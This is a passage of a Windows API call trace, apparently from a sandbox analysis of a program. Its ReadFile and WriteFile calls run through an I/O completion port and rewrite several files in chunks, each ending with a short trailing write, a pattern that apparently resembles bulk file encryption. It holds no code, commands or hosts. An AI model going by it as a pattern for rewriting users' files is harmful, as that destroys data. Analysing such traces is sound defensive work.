lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.966] WriteFile (in: hFile=0x1b4, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x36c0020) returned 1 [0158.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.966] WriteFile (in: hFile=0x194, lpBuffer=0x3900094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3900020 | out: lpBuffer=0x3900094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3900020) returned 1 [0158.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.966] CloseHandle (hObject=0x1c8) returned 1 [0158.969] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0158.971] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.972] CloseHandle (hObject=0x1b4) returned 1 [0158.974] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0158.976] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0158.976] CloseHandle (hObject=0x194) returned 1 [0158.977] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3900020) returned 1 [0158.980] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.051] ReadFile (in: hFile=0x1b4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 1 [0159.051] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.051] WriteFile (in: hFile=0x1b4, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.053] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.053] ReadFile (in: hFile=0x1b4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 0x0 [0159.053] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.053] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.053] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.053] WriteFile (in: hFile=0x1b4, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.079] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.079] CloseHandle (hObject=0x1b4) returned 1 [0159.082] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0159.085] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.124] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x710020) returned 1 [0159.340] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.340] ReadFile (in: hFile=0x1b4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2b70020) returned 1 [0159.394] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.394] ReadFile (in: hFile=0x1c8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3510020) returned 1 [0159.395] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.395] ReadFile (in: hFile=0x1f0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3630020) returned 1 [0159.396] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.396] ReadFile (in: hFile=0x1ac, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3750020) returned 1 [0159.396] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.397] ReadFile (in: hFile=0x1f4, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3870020) returned 1 [0159.397] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.397] WriteFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x710020) returned 0x0 [0159.398] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.398] ReadFile (in: hFile=0x1d4, lpBuffer=0x3990124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x3990020) returned 1 [0159.398] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.398] WriteFile (in: hFile=0x1b4, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020) returned 1 [0159.429] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.429] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3510020) returned 1 [0159.430] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.430] WriteFile (in: hFile=0x1f4, lpBuffer=0x3870124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3870020) returned 1 [0159.434] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.434] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0159.434] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.434] WriteFile (in: hFile=0x1b4, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020) returned 1 [0159.439] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.439] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0159.439] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.439] WriteFile (in: hFile=0x1ac, lpBuffer=0x3750094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3750020 | out: lpBuffer=0x3750094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x3750020) returned 1 [0159.445] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.445] CloseHandle (hObject=0x1c8) returned 1 [0159.457] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0159.460] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.460] CloseHandle (hObject=0x1d4) returned 1 [0159.481] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3990020) returned 1 [0159.483] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.583] ReadFile (in: hFile=0x1bc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x710020) returned 1 [0159.584] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.584] ReadFile (in: hFile=0x1d0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2b70020) returned 1 [0159.585] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.585] WriteFile (in: hFile=0x1bc, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x12c82, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x710020) returned 1 [0159.585] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.585] WriteFile (in: hFile=0x1d0, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x15002, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020) returned 1 [0159.586] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.586] ReadFile (in: hFile=0x1bc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x710020) returned 0x0 [0159.586] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.586] ReadFile (in: hFile=0x1d0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0159.586] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.586] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.586] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.586] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0159.586] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.586] WriteFile (in: hFile=0x1bc, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x710020) returned 1 [0159.586] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.586] WriteFile (in: hFile=0x1d0, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2b70020) returned 1 [0159.587] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.587] CloseHandle (hObject=0x1bc) returned 1 [0159.588] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0159.588] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.588] CloseHandle (hObject=0x1d0) returned 1 [0159.589] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0159.592] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.664] ReadFile (in: hFile=0x1bc, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 1 [0159.664] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.664] WriteFile (in: hFile=0x1bc, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x7174, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.664] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.664] ReadFile (in: hFile=0x1bc, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 0x0 [0159.664] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.665] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.665] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.665] WriteFile (in: hFile=0x1bc, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.665] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.665] CloseHandle (hObject=0x1bc) returned 1 [0159.666] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0159.668] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.721] ReadFile (in: hFile=0x1c, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 1 [0159.722] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.722] WriteFile (in: hFile=0x1c, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0xdcf8, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2eaf918, lpOverlapped=0x2690020) returned 1 [0159.722] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 1 [0159.722] ReadFile (in: hFile=0x1c, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2eaf918, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2eaf918*=0x0, lpOverlapped=0x2690020) returned 0x0 [0159.722] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c) returned 0 [0159.723] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.723] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x2eaf918, lpCompletionKey=0x2eaf914, lpOverlapped=0x2eaf91c, dwMilliseconds=0xffffffff | out: 